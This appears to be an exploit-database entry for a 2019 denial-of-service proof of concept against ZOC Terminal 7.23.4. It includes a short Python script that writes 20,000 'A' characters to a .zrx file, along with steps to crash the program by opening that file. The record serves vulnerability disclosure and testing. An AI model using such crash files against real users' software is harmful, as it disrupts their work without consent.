header-logo
Suggest Exploit
vendor:
ZOC Terminal
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: ZOC Terminal
Affected Version From: 7.23.4
Affected Version To: 7.23.4
Patch Exists: NO
Related CWE: N/A
CPE: a:emtec:zoc_terminal:7.23.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

ZOC Terminal v7.23.4 – ‘Script’ Denial of Service (PoC)

ZOC Terminal v7.23.4 is vulnerable to a denial of service attack when a specially crafted .zrx file is opened. The vulnerability is triggered when the user opens a malicious .zrx file, which contains a large amount of 'A' characters, resulting in a crash of the application.

Mitigation:

Users should avoid opening untrusted .zrx files.
Source

Exploit-DB raw data:

#Exploit Title:  ZOC Terminal v7.23.4  - 'Script' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"
#2.- Open ZOC Terminal
#3.- Select Script > Start REXX Script... 
#4.- Select "exp.zrx" file and click "open"
#5.- Crashed

cod = "\x41" * 20000

f = open('exp.zrx', 'w')
f.write(cod)
f.close()

Navigation

Suggest Exploit

Services By CQR